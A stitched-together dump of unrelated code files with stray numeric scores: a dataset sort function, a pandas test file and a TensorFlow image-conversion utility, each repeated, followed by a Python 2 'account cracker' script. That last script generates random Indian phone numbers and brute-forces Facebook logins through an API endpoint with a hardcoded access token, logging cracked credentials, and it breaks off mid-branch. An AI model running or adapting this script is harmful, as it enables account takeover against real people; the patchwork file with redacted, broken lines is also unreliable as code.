# useful url: https://realpython.com/python-sort/
# organize the params list--sort by last param first
# default sort order is ascending
if params[0] not in ['asc', 'desc']:
params.insert(0, 'asc')
# reverse the list
params = params[::-1]
# re-insert the sort orders before their associated sort keys
insert_at = 0
for i in range(len(params)):
if params[i] in ['asc', 'desc']:
param = params.pop(i)
params.insert(insert_at, param)
insert_at = i + 1
# sort the dataset
reverse = True
for param in params:
if param in ['asc', 'desc']:
# set the sort order
reverse = (param == 'desc')
else:
# sort on this parameter
# Note: Parameter strings can follow these formats:
# 'attr' sort on project attribute
# 'uuids.key' sort on project uuid
# 'meta.key' sort on project meta
# 'v.attr' sort on version attribute
# 'v.uuids.key' sort on version uuid
# 'v.meta.key' sort on version meta
p_list = param.split('.')
# determine if we're sorting on project or version
on_project = True
if p_list[0] == 'v':
on_project = False
p_list.pop(0)
# build a sort function
attr = p_list[0]
if attr == 'uuids':
# sort on a uuid value
def sort_uuid(o: object):
if not key in o.uuids_:
raise Exception('Nonexistent sort key.')
return o.uuids_[key]()
key = p_list[1]
sort_func = lambda o: sort_uuid(o)
elif attr == 'meta':
# sort on a meta value
def sort_meta(o: object):
if not key in o.meta_:
raise Exception('Nonexistent sort key.')
return o.meta_[key]()
key = p_list[1]
sort_func = lambda o: sort_meta(o)
else:
# sort on a regular attribute
def sort_attr(o: object):
if not hasattr(o, attr) and not sort.keyerr_warning:
print(" Warning: Sort key '%s' was not "
'found in all projects/versions; assuming '
"'' for those items." % attr)
sort.keyerr_warning = True
# get & clean up the attribute
val = getattr(o, attr, '')
if isinstance(val, str):
val = val.lower()
return val
sort.keyerr_warning = False
sort_func = lambda o: sort_attr(o)
# perform the sort
if on_project:
# sort on project
ds.projects.sort(key=sort_func, reverse=reverse)
else:
# sort on version
for project in ds.projects:
project.versions.sort(key=sort_func, reverse=reverse)
total_versions = sum([len(p.versions) for p in ds.projects])
print(' Sorted {:,} projects and {:,} versions by {}.'
.format(len(ds.projects), total_versions, str(params))) | r2c_isg/functions/sort.py | from typing import List
from r2c_isg.structures import Dataset
def sort(ds: Dataset, params: List[str]) -> None:
"""Sorts the projects/versions based on the given parameters."""
# useful url: https://realpython.com/python-sort/
# organize the params list--sort by last param first
# default sort order is ascending
if params[0] not in ['asc', 'desc']:
params.insert(0, 'asc')
# reverse the list
params = params[::-1]
# re-insert the sort orders before their associated sort keys
insert_at = 0
for i in range(len(params)):
if params[i] in ['asc', 'desc']:
param = params.pop(i)
params.insert(insert_at, param)
insert_at = i + 1
# sort the dataset
reverse = True
for param in params:
if param in ['asc', 'desc']:
# set the sort order
reverse = (param == 'desc')
else:
# sort on this parameter
# Note: Parameter strings can follow these formats:
# 'attr' sort on project attribute
# 'uuids.key' sort on project uuid
# 'meta.key' sort on project meta
# 'v.attr' sort on version attribute
# 'v.uuids.key' sort on version uuid
# 'v.meta.key' sort on version meta
p_list = param.split('.')
# determine if we're sorting on project or version
on_project = True
if p_list[0] == 'v':
on_project = False
p_list.pop(0)
# build a sort function
attr = p_list[0]
if attr == 'uuids':
# sort on a uuid value
def sort_uuid(o: object):
if not key in o.uuids_:
raise Exception('Nonexistent sort key.')
return o.uuids_[key]()
key = p_list[1]
sort_func = lambda o: sort_uuid(o)
elif attr == 'meta':
# sort on a meta value
def sort_meta(o: object):
if not key in o.meta_:
raise Exception('Nonexistent sort key.')
return o.meta_[key]()
key = p_list[1]
sort_func = lambda o: sort_meta(o)
else:
# sort on a regular attribute
def sort_attr(o: object):
if not hasattr(o, attr) and not sort.keyerr_warning:
print(" Warning: Sort key '%s' was not "
'found in all projects/versions; assuming '
"'' for those items." % attr)
sort.keyerr_warning = True
# get & clean up the attribute
val = getattr(o, attr, '')
if isinstance(val, str):
val = val.lower()
return val
sort.keyerr_warning = False
sort_func = lambda o: sort_attr(o)
# perform the sort
if on_project:
# sort on project
ds.projects.sort(key=sort_func, reverse=reverse)
else:
# sort on version
for project in ds.projects:
project.versions.sort(key=sort_func, reverse=reverse)
total_versions = sum([len(p.versions) for p in ds.projects])
print(' Sorted {:,} projects and {:,} versions by {}.'
.format(len(ds.projects), total_versions, str(params))) | 0.864625 | 0.354545 |
import numpy as np
from perspective.table import Table
from random import random, randint, choice
from faker import Faker
import pandas as pd
fake = Faker()
def superstore(count=10):
data = []
for id in range(count):
dat = {}
dat['Row ID'] = id
dat['Order ID'] = fake.ein()
dat['Order Date'] = fake.date_this_year()
dat['Ship Date'] = fake.date_between_dates(dat['Order Date']).strftime('%Y-%m-%d')
dat['Order Date'] = dat['Order Date'].strftime('%Y-%m-%d')
dat['Ship Mode'] = choice(['First Class', 'Standard Class', 'Second Class'])
dat['Ship Mode'] = choice(['First Class', 'Standard Class', 'Second Class'])
dat['Customer ID'] = fake.license_plate()
dat['Segment'] = choice(['A', 'B', 'C', 'D'])
dat['Country'] = 'US'
dat['City'] = fake.city()
dat['State'] = fake.state()
dat['Postal Code'] = fake.zipcode()
dat['Region'] = choice(['Region %d' % i for i in range(5)])
dat['Product ID'] = fake.bban()
sector = choice(['Industrials', 'Technology', 'Financials'])
industry = choice(['A', 'B', 'C'])
dat['Category'] = sector
dat['Sub-Category'] = industry
dat['Sales'] = randint(1, 100) * 100
dat['Quantity'] = randint(1, 100) * 10
dat['Discount'] = round(random() * 100, 2)
dat['Profit'] = round(random() * 1000, 2)
data.append(dat)
return pd.DataFrame(data)
class TestTableNumpy(object):
def test_empty_table(self):
tbl = Table([])
assert tbl.size() == 0
def test_table_dataframe(self):
import pandas as pd
data = pd.DataFrame([{"a": 1, "b": 2}, {"a": 3, "b": 4}])
tbl = Table(data)
assert tbl.size() == 2
def test_table_series(self):
import pandas as pd
data = pd.Series([1, 2, 3], name="a")
tbl = Table(data)
assert tbl.size() == 3
def test_rowpivots(self):
# basic
df = superstore()
df_pivoted = df.set_index(['Country', 'Region'])
table = Table(df_pivoted)
def test_pivottable(self):
df = superstore()
pt = pd.pivot_table(df, values='Discount', index=['Country', 'Region'], columns='Category')
table = Table(pt)
def test_colpivots(self):
arrays = [np.array(['bar', 'bar', 'bar', 'bar', 'baz', 'baz', 'baz', 'baz', 'foo', 'foo', 'foo', 'foo', 'qux', 'qux', 'qux', 'qux']),
np.array(['one', 'one', 'two', 'two', 'one', 'one', 'two', 'two', 'one', 'one', 'two', 'two', 'one', 'one', 'two', 'two']),
np.array(['X', 'Y', 'X', 'Y', 'X', 'Y', 'X', 'Y', 'X', 'Y', 'X', 'Y', 'X', 'Y', 'X', 'Y'])]
tuples = list(zip(*arrays))
index = pd.MultiIndex.from_tuples(tuples, names=['first', 'second', 'third'])
df_both = pd.DataFrame(np.random.randn(3, 16), index=['A', 'B', 'C'], columns=index)
table = Table(df_both) | python/perspective/perspective/tests/table/test_table_pandas.py |
import numpy as np
from perspective.table import Table
from random import random, randint, choice
from faker import Faker
import pandas as pd
fake = Faker()
def superstore(count=10):
data = []
for id in range(count):
dat = {}
dat['Row ID'] = id
dat['Order ID'] = fake.ein()
dat['Order Date'] = fake.date_this_year()
dat['Ship Date'] = fake.date_between_dates(dat['Order Date']).strftime('%Y-%m-%d')
dat['Order Date'] = dat['Order Date'].strftime('%Y-%m-%d')
dat['Ship Mode'] = choice(['First Class', 'Standard Class', 'Second Class'])
dat['Ship Mode'] = choice(['First Class', 'Standard Class', 'Second Class'])
dat['Customer ID'] = fake.license_plate()
dat['Segment'] = choice(['A', 'B', 'C', 'D'])
dat['Country'] = 'US'
dat['City'] = fake.city()
dat['State'] = fake.state()
dat['Postal Code'] = fake.zipcode()
dat['Region'] = choice(['Region %d' % i for i in range(5)])
dat['Product ID'] = fake.bban()
sector = choice(['Industrials', 'Technology', 'Financials'])
industry = choice(['A', 'B', 'C'])
dat['Category'] = sector
dat['Sub-Category'] = industry
dat['Sales'] = randint(1, 100) * 100
dat['Quantity'] = randint(1, 100) * 10
dat['Discount'] = round(random() * 100, 2)
dat['Profit'] = round(random() * 1000, 2)
data.append(dat)
return pd.DataFrame(data)
class TestTableNumpy(object):
def test_empty_table(self):
tbl = Table([])
assert tbl.size() == 0
def test_table_dataframe(self):
import pandas as pd
data = pd.DataFrame([{"a": 1, "b": 2}, {"a": 3, "b": 4}])
tbl = Table(data)
assert tbl.size() == 2
def test_table_series(self):
import pandas as pd
data = pd.Series([1, 2, 3], name="a")
tbl = Table(data)
assert tbl.size() == 3
def test_rowpivots(self):
# basic
df = superstore()
df_pivoted = df.set_index(['Country', 'Region'])
table = Table(df_pivoted)
def test_pivottable(self):
df = superstore()
pt = pd.pivot_table(df, values='Discount', index=['Country', 'Region'], columns='Category')
table = Table(pt)
def test_colpivots(self):
arrays = [np.array(['bar', 'bar', 'bar', 'bar', 'baz', 'baz', 'baz', 'baz', 'foo', 'foo', 'foo', 'foo', 'qux', 'qux', 'qux', 'qux']),
np.array(['one', 'one', 'two', 'two', 'one', 'one', 'two', 'two', 'one', 'one', 'two', 'two', 'one', 'one', 'two', 'two']),
np.array(['X', 'Y', 'X', 'Y', 'X', 'Y', 'X', 'Y', 'X', 'Y', 'X', 'Y', 'X', 'Y', 'X', 'Y'])]
tuples = list(zip(*arrays))
index = pd.MultiIndex.from_tuples(tuples, names=['first', 'second', 'third'])
df_both = pd.DataFrame(np.random.randn(3, 16), index=['A', 'B', 'C'], columns=index)
table = Table(df_both) | 0.428473 | 0.313197 |
import math
import collections
import hashlib
import os.path
import re
import sys
import tensorflow as tf
import dataset_utils
from download_and_convert_flowers import ImageReader
from local_dataset import get_dataset_filename, NUM_SHARDS
MAX_NUM_IMAGES_PER_CLASS = 2 ** 27 - 1 # ~134M
LABELS_FILENAME = 'labels.txt'
def create_image_lists(image_dir, testing_percentage=10, validation_percentage=10):
"""Builds a list of training images from the file system.
Analyzes the sub folders in the image directory, splits them into stable
training, testing, and validation sets, and returns a data structure
describing the lists of images for each label and their paths.
Args:
image_dir: String path to a folder containing subfolders of images.
testing_percentage: Integer percentage of the images to reserve for tests.
validation_percentage: Integer percentage of images reserved for validation.
Returns:
An OrderedDict containing an entry for each label subfolder, with images
split into training, testing, and validation sets within each label.
The order of items defines the class indices.
"""
if not tf.gfile.Exists(image_dir):
tf.logging.error("Image directory '" + image_dir + "' not found.")
return None
result = collections.OrderedDict()
sub_dirs = sorted(x[0] for x in tf.gfile.Walk(image_dir))
# The root directory comes first, so skip it.
is_root_dir = True
for sub_dir in sub_dirs:
if is_root_dir:
is_root_dir = False
continue
extensions = sorted(set(os.path.normcase(ext) # Smash case on Windows.
for ext in ['JPEG', 'JPG', 'jpeg', 'jpg', 'png']))
file_list = []
dir_name = os.path.basename(
# tf.gfile.Walk() returns sub-directory with trailing '/' when it is in
# Google Cloud Storage, which confuses os.path.basename().
sub_dir[:-1] if sub_dir.endswith('/') else sub_dir)
if dir_name == image_dir:
continue
tf.logging.info("Looking for images in '" + dir_name + "'")
for extension in extensions:
file_glob = os.path.join(image_dir, dir_name, '*.' + extension)
file_list.extend(tf.gfile.Glob(file_glob))
if not file_list:
tf.logging.warning('No files found')
continue
if len(file_list) < 20:
tf.logging.warning(
'WARNING: Folder has less than 20 images, which may cause issues.')
elif len(file_list) > MAX_NUM_IMAGES_PER_CLASS:
tf.logging.warning(
'WARNING: Folder {} has more than {} images. Some images will '
'never be selected.'.format(dir_name, MAX_NUM_IMAGES_PER_CLASS))
label_name = re.sub(r'[^a-z0-9]+', ' ', dir_name.lower())
training_images = []
testing_images = []
validation_images = []
for file_name in file_list:
base_name = os.path.basename(file_name)
# We want to ignore anything after '_nohash_' in the file name when
# deciding which set to put an image in, the data set creator has a way of
# grouping photos that are close variations of each other. For example
# this is used in the plant disease data set to group multiple pictures of
# the same leaf.
hash_name = re.sub(r'_nohash_.*$', '', file_name)
# This looks a bit magical, but we need to decide whether this file should
# go into the training, testing, or validation sets, and we want to keep
# existing files in the same set even if more files are subsequently
# added.
# To do that, we need a stable way of deciding based on just the file name
# itself, so we do a hash of that and then use that to generate a
# probability value that we use to assign it.
hash_name_hashed = hashlib.sha1(
tf.compat.as_bytes(hash_name)).hexdigest()
percentage_hash = ((int(hash_name_hashed, 16) %
(MAX_NUM_IMAGES_PER_CLASS + 1)) *
(100.0 / MAX_NUM_IMAGES_PER_CLASS))
if percentage_hash < validation_percentage:
validation_images.append(base_name)
elif percentage_hash < (testing_percentage + validation_percentage):
testing_images.append(base_name)
else:
training_images.append(base_name)
result[label_name] = {
'dir': dir_name,
'training': training_images,
'testing': testing_images,
'validation': validation_images,
}
return result
def convert_dataset(split_name, filenames, class_names_to_ids, dataset_dir):
"""Converts the given filenames to a TFRecord dataset.
Args:
split_name: The name of the dataset, either 'train' or 'validation'.
filenames: A list of absolute paths to png or jpg images.
class_names_to_ids: A dictionary from class names (strings) to ids
(integers).
dataset_dir: The directory where the converted datasets are stored.
"""
assert split_name in ['train', 'validation']
num_per_shard = int(math.ceil(len(filenames) / float(NUM_SHARDS)))
with tf.Graph().as_default():
image_reader = ImageReader()
with tf.Session('') as sess:
for shard_id in range(NUM_SHARDS):
output_filename = get_dataset_filename(
dataset_dir, split_name, shard_id)
with tf.python_io.TFRecordWriter(output_filename) as tfrecord_writer:
start_ndx = shard_id * num_per_shard
end_ndx = min((shard_id+1) * num_per_shard, len(filenames))
for i in range(start_ndx, end_ndx):
sys.stdout.write('\r>> Converting image %d/%d shard %d' % (
i+1, len(filenames), shard_id))
sys.stdout.flush()
# Read the filename:
image_data = tf.gfile.GFile(filenames[i], 'rb').read()
height, width = image_reader.read_image_dims(
sess, image_data)
class_name = os.path.basename(
os.path.dirname(filenames[i]))
class_id = class_names_to_ids[class_name]
example = dataset_utils.image_to_tfexample(
image_data, b'jpg', height, width, class_id)
tfrecord_writer.write(example.SerializeToString())
sys.stdout.write('\n')
sys.stdout.flush() | research/slim/datasets/convert_utils.py |
import math
import collections
import hashlib
import os.path
import re
import sys
import tensorflow as tf
import dataset_utils
from download_and_convert_flowers import ImageReader
from local_dataset import get_dataset_filename, NUM_SHARDS
MAX_NUM_IMAGES_PER_CLASS = 2 ** 27 - 1 # ~134M
LABELS_FILENAME = 'labels.txt'
def create_image_lists(image_dir, testing_percentage=10, validation_percentage=10):
"""Builds a list of training images from the file system.
Analyzes the sub folders in the image directory, splits them into stable
training, testing, and validation sets, and returns a data structure
describing the lists of images for each label and their paths.
Args:
image_dir: String path to a folder containing subfolders of images.
testing_percentage: Integer percentage of the images to reserve for tests.
validation_percentage: Integer percentage of images reserved for validation.
Returns:
An OrderedDict containing an entry for each label subfolder, with images
split into training, testing, and validation sets within each label.
The order of items defines the class indices.
"""
if not tf.gfile.Exists(image_dir):
tf.logging.error("Image directory '" + image_dir + "' not found.")
return None
result = collections.OrderedDict()
sub_dirs = sorted(x[0] for x in tf.gfile.Walk(image_dir))
# The root directory comes first, so skip it.
is_root_dir = True
for sub_dir in sub_dirs:
if is_root_dir:
is_root_dir = False
continue
extensions = sorted(set(os.path.normcase(ext) # Smash case on Windows.
for ext in ['JPEG', 'JPG', 'jpeg', 'jpg', 'png']))
file_list = []
dir_name = os.path.basename(
# tf.gfile.Walk() returns sub-directory with trailing '/' when it is in
# Google Cloud Storage, which confuses os.path.basename().
sub_dir[:-1] if sub_dir.endswith('/') else sub_dir)
if dir_name == image_dir:
continue
tf.logging.info("Looking for images in '" + dir_name + "'")
for extension in extensions:
file_glob = os.path.join(image_dir, dir_name, '*.' + extension)
file_list.extend(tf.gfile.Glob(file_glob))
if not file_list:
tf.logging.warning('No files found')
continue
if len(file_list) < 20:
tf.logging.warning(
'WARNING: Folder has less than 20 images, which may cause issues.')
elif len(file_list) > MAX_NUM_IMAGES_PER_CLASS:
tf.logging.warning(
'WARNING: Folder {} has more than {} images. Some images will '
'never be selected.'.format(dir_name, MAX_NUM_IMAGES_PER_CLASS))
label_name = re.sub(r'[^a-z0-9]+', ' ', dir_name.lower())
training_images = []
testing_images = []
validation_images = []
for file_name in file_list:
base_name = os.path.basename(file_name)
# We want to ignore anything after '_nohash_' in the file name when
# deciding which set to put an image in, the data set creator has a way of
# grouping photos that are close variations of each other. For example
# this is used in the plant disease data set to group multiple pictures of
# the same leaf.
hash_name = re.sub(r'_nohash_.*$', '', file_name)
# This looks a bit magical, but we need to decide whether this file should
# go into the training, testing, or validation sets, and we want to keep
# existing files in the same set even if more files are subsequently
# added.
# To do that, we need a stable way of deciding based on just the file name
# itself, so we do a hash of that and then use that to generate a
# probability value that we use to assign it.
hash_name_hashed = hashlib.sha1(
tf.compat.as_bytes(hash_name)).hexdigest()
percentage_hash = ((int(hash_name_hashed, 16) %
(MAX_NUM_IMAGES_PER_CLASS + 1)) *
(100.0 / MAX_NUM_IMAGES_PER_CLASS))
if percentage_hash < validation_percentage:
validation_images.append(base_name)
elif percentage_hash < (testing_percentage + validation_percentage):
testing_images.append(base_name)
else:
training_images.append(base_name)
result[label_name] = {
'dir': dir_name,
'training': training_images,
'testing': testing_images,
'validation': validation_images,
}
return result
def convert_dataset(split_name, filenames, class_names_to_ids, dataset_dir):
"""Converts the given filenames to a TFRecord dataset.
Args:
split_name: The name of the dataset, either 'train' or 'validation'.
filenames: A list of absolute paths to png or jpg images.
class_names_to_ids: A dictionary from class names (strings) to ids
(integers).
dataset_dir: The directory where the converted datasets are stored.
"""
assert split_name in ['train', 'validation']
num_per_shard = int(math.ceil(len(filenames) / float(NUM_SHARDS)))
with tf.Graph().as_default():
image_reader = ImageReader()
with tf.Session('') as sess:
for shard_id in range(NUM_SHARDS):
output_filename = get_dataset_filename(
dataset_dir, split_name, shard_id)
with tf.python_io.TFRecordWriter(output_filename) as tfrecord_writer:
start_ndx = shard_id * num_per_shard
end_ndx = min((shard_id+1) * num_per_shard, len(filenames))
for i in range(start_ndx, end_ndx):
sys.stdout.write('\r>> Converting image %d/%d shard %d' % (
i+1, len(filenames), shard_id))
sys.stdout.flush()
# Read the filename:
image_data = tf.gfile.GFile(filenames[i], 'rb').read()
height, width = image_reader.read_image_dims(
sess, image_data)
class_name = os.path.basename(
os.path.dirname(filenames[i]))
class_id = class_names_to_ids[class_name]
example = dataset_utils.image_to_tfexample(
image_data, b'jpg', height, width, class_id)
tfrecord_writer.write(example.SerializeToString())
sys.stdout.write('\n')
sys.stdout.flush() | 0.605333 | 0.424591 |
import os, sys, time, datetime, random, hashlib, re, threading, json, urllib, cookielib, getpass
os.system('rm -rf .txt')
for n in range(98969):
nmbr = random.randint(1111111, 9999999)
sys.stdout = open('.txt', 'a')
print nmbr
sys.stdout.flush()
try:
import requests
except ImportError:
os.system('pip2 install requests')
try:
import mechanize
except ImportError:
os.system('pip2 install mechanize')
time.sleep(1)
os.system('python2 .README.md')
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('user-agent', 'Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')]
def exb():
print '[!] Exit'
os.sys.exit()
def psb(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.03)
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(3.0 / 200)
def t():
time.sleep(1)
def cb():
os.system('clear')
logo = "\n\x1b[1;91m ______ \x1b[1;95m _____ __ __)\x1b[1;92m ______\n \x1b[1;91m (, / )\x1b[1;97m (, / (, /| / \x1b[1;92m (, / )\n \x1b[1;91m /---( \x1b[1;93m / / | / \x1b[1;92m / /\n\x1b[1;91m ) / ____)\x1b[1;94m___/__ ) / |/ \x1b[1;92m _/___ /_\n\x1b[1;91m(_/ ( (__\x1b[1;96m / (_/ ' \x1b[1;92m (_/___ / \n\x1b[1;90m AUTOMATIC ACCOUNT CRACKER BY \x1b[1;96mBOTOL BABA\n\x1b[1;97m--------------------------------------------------\n\x1b[1;95m\n AUTHOR : <NAME>\n FACEBOOK : FACEBOOK.COM/THEMEHTAN\n YOUTUBE : YOUTUBE.COM/MASTERTRICK1\n GITHUB : GITHUB.COM/BOTOLMEHEDI\n\x1b[1;32m\n--------------------------------------------------\n "
back = 0
successful = []
cpb = []
oks = []
id = []
def babaindseven():
os.system('clear')
print logo
print 'CRACK ONLY 7 DIGITS HACKABLE ACCOUNTS'
print
jalan('\x1b[1;91m [1] \x1b[1;93mSTART CRACK')
print
jalan('\x1b[1;92m [2] UPDATE TOOL')
print
jalan('\x1b[1;96m [3] BACK TO HOME')
print
jalan('\x1b[1;97m [0] EXIT')
print 50 * '-'
action()
def action():
global cpb
global oks
bch = raw_input('\n ===> ')
if bch == '':
print '[!] Fill in correctly'
action()
elif bch == '1':
os.system('clear')
print logo
print
try:
c = raw_input('TYPE ANY 3 DIGIT NUMBER \n\n \x1b[1;93m TYPE ANY CODE FROM 954 TO 997 : ')
k = '+91'
idlist = '.txt'
for line in open(idlist, 'r').readlines():
id.append(line.strip())
except IOError:
print '[!] File Not Found'
raw_input('\n[ Back ]')
babaindseven()
elif bch == '2':
os.system('clear')
os.system('pip2 install --upgrade babaindseven')
os.system('clear')
print logo
print
psb('7 DIGIT INDIAN CRACKER UPDATED SUCCESSFULLY')
time.sleep(2)
os.system('python2 .README.md')
elif bch == '3':
os.system('python2 .README.md')
elif bch == '0':
exb()
else:
print '[!] Fill in correctly'
action()
xxx = str(len(id))
psb('[\xe2\x9c\x93] TOTAL NUMBERS: ' + xxx)
time.sleep(0.5)
psb('[\xe2\x9c\x93] PLEASE WAIT, PROCESS IS RUNNING ...')
time.sleep(0.5)
psb('[!] TO STOP THIS PROCESS PRESS Ctrl THEN z')
time.sleep(0.5)
print 50 * '-'
print
def main(arg):
user = arg
try:
os.mkdir('save')
except OSError:
pass
try:
pass1 = <PASSWORD>
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass1 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass1 + '\n')
okb.close()
oks.append(c + user + pass1)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass1 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass1 + '\n')
cps.close()
cpb.append(c + user + pass1)
else:
pass2 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=<PASSWORD>&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass2 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass2 + '\n')
okb.close()
oks.append(c + user + pass2)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass2 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass2 + '\n')
cps.close()
cpb.append(c + user + pass2)
else:
pass3 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass3 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass3 + '\n')
okb.close()
oks.append(c + user + pass3)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass3 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass3 + '\n')
cps.close()
cpb.append(c + user + pass3)
else:
pass4 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass4 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass4 + '\n')
okb.close()
oks.append(c + user + pass4)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass4 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass4 + '\n')
cps.close()
cpb.append(c + user + pass4)
pass5 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass5 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass5 + '\n')
okb.close()
oks.append(c + user + pass5)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass5 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass5 + '\n')
cps.close()
cpb.append(c + user + pass5)
else:
pass6 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass6 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass6 + '\n')
okb.close()
oks.append(c + user + pass6)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass6 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass6 + '\n')
cps.close()
cpb.append(c + user + pass6)
else:
pass7 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass7 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass7 + '\n')
okb.close()
oks.append(c + user + pass7)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass7 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass7 + '\n')
cps.close()
cpb.append(c + user + pass7)
else:
pass8 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass8 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass8 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass8 + '\n')
okb.close()
oks.append(c + user + pass8)
elif 'www.facebook.com' in q['error_msg']:
